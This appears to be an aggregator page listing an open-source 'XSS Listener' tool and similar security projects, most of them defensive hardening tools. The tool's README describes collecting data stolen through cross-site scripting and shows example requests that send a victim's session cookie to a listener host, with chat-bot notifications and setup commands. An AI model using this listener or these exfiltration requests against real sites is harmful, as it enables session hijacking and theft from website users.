cagataycali / Xss Listener
Licence: mit
🕷️ XSS Listener is a penetration tool for easy to steal data with various XSS.
Stars: ✭ 414
Programming Languages
javascript
184084 projects - #8 most used programming language
Projects that are alternatives of or similar to Xss Listener
Lynis
Lynis - Security auditing tool for Linux, macOS, and UNIX-based systems. Assists with compliance testing (HIPAA/ISO27001/PCI DSS) and system hardening. Agentless, and installation optional.
Stars: ✭ 9,137 (+2107%)
Mutual labels: security-tools, security-hardening
Cerberus
一款功能强大的漏洞扫描器,子域名爆破使用aioDNS,asyncio异步快速扫描,覆盖目标全方位资产进行批量漏洞扫描,中间件信息收集,自动收集ip代理,探测Waf信息时自动使用来保护本机真实Ip,在本机Ip被Waf杀死后,自动切换代理Ip进行扫描,Waf信息收集(国内外100+款waf信息)包括安全狗,云锁,阿里云,云盾,腾讯云等,提供部分已知waf bypass 方案,中间件漏洞检测(Thinkphp,weblogic等 CVE-2018-5955,CVE-2018-12613,CVE-2018-11759等),支持SQL注入, XSS, 命令执行,文件包含, ssrf 漏洞扫描, 支持自定义漏洞邮箱推送功能
Stars: ✭ 389 (-6.04%)
Mutual labels: security-tools, xss
Vuls
Agent-less vulnerability scanner for Linux, FreeBSD, Container, WordPress, Programming language libraries, Network devices
Stars: ✭ 8,844 (+2036.23%)
Mutual labels: security-tools, security-hardening
Canary
Canary: Input Detection and Response
Stars: ✭ 29 (-93%)
Mutual labels: security-tools, security-hardening
Electriceye
Continuously monitor your AWS services for configurations that can lead to degradation of confidentiality, integrity or availability. All results will be sent to Security Hub for further aggregation and analysis.
Stars: ✭ 255 (-38.41%)
Mutual labels: security-tools, security-hardening
Linux Secureboot Kit
Tool for complete hardening of Linux boot chain with UEFI Secure Boot
Stars: ✭ 54 (-86.96%)
Mutual labels: security-tools, security-hardening
Karn
Simplifying Seccomp enforcement in containerized or non-containerized apps
Stars: ✭ 104 (-74.88%)
Mutual labels: security-tools, security-hardening
Awesome Security Hardening
A collection of awesome security hardening guides, tools and other resources
Stars: ✭ 630 (+52.17%)
Mutual labels: security-tools, security-hardening
html-contextual-autoescaper-java
Prevents XSS by figuring out how to escape untrusted values in templates
Stars: ✭ 15 (-96.38%)
Mutual labels: xss, security-hardening
Privacy.sexy
Open-source tool to enforce privacy & security best-practices on Windows and macOS, because privacy is sexy 🍑🍆
Stars: ✭ 221 (-46.62%)
Mutual labels: security-tools, security-hardening
Golang Tls
Simple Golang HTTPS/TLS Examples
Stars: ✭ 857 (+107%)
Mutual labels: security-tools, security-hardening
Prowler
Prowler is a security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness. It contains more than 200 controls covering CIS, ISO27001, GDPR, HIPAA, SOC2, ENS and other security frameworks.
Stars: ✭ 4,561 (+1001.69%)
Mutual labels: security-tools, security-hardening
Marsnake
System Optimizer and Monitoring, Security Auditing, Vulnerability scanner for Linux, macOS, and UNIX-based systems
Stars: ✭ 16 (-96.14%)
Mutual labels: security-tools, security-hardening
Audit scripts
Scripts to gather system configuration information for offline/remote auditing
Stars: ✭ 55 (-86.71%)
Mutual labels: security-tools, security-hardening
Hardening
Hardening Ubuntu. Systemd edition.
Stars: ✭ 705 (+70.29%)
Mutual labels: security-tools, security-hardening
Content
Security automation content in SCAP, OSCAL, Bash, Ansible, and other formats
Stars: ✭ 1,219 (+194.44%)
Mutual labels: security-tools, security-hardening
Tracy
A tool designed to assist with finding all sinks and sources of a web application and display these results in a digestible manner.
Stars: ✭ 464 (+12.08%)
Mutual labels: security-tools, xss
Terraform Aws Secure Baseline
Terraform module to set up your AWS account with the secure baseline configuration based on CIS Amazon Web Services Foundations and AWS Foundational Security Best Practices.
Stars: ✭ 596 (+43.96%)
Mutual labels: security-tools, security-hardening
Ansible Role Hardening
Ansible role to apply a security baseline. Systemd edition.
Stars: ✭ 188 (-54.59%)
Mutual labels: security-tools, security-hardening
Krane
Kubernetes RBAC static Analysis & visualisation tool
Stars: ✭ 254 (-38.65%)
Mutual labels: security-tools, security-hardening
🕷️ XSS Listener is a penetration tool for easy to steal data with various XSS.
From now on, you do not need XSS listeners! XSS listener records the data you have stolen on the remote site in the database, and gives instant notification with telegram / slack.
🕸️ Know-How Background
🕸️ Listener Usage
Listener accepts all HTTP methods with parameters, then save database. Example:
GET https://yourapp.com/?cookie=PHPSESSID=889c6594db2541db1666cefca7537373
or
POST https://yourapp.com/
Form: { cookie:'PHPSESSID=889c6594db2541db1666cefca7537373' }
You will notify by telegram bot.
🕸️ Detailed Usage
🕸️ List previous requests
🕸️ Delete previous request by id
https://yourapp.com/delete/[id]
🕸️ Even you can use telegram (and / or Slack!)
/list
/delete [id]
🕸️ Run local environment
In terminal,
git clone https://github.com/cagataycali/xss-listener.git; # Clone
cd xss-listener; # Change directory.
npm install; # Install dependencies.
cp .env.example .env
# Fill in .env with required values.
# Fill bot token and user id.
node index.js
License
MIT © Çağatay Çalı
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].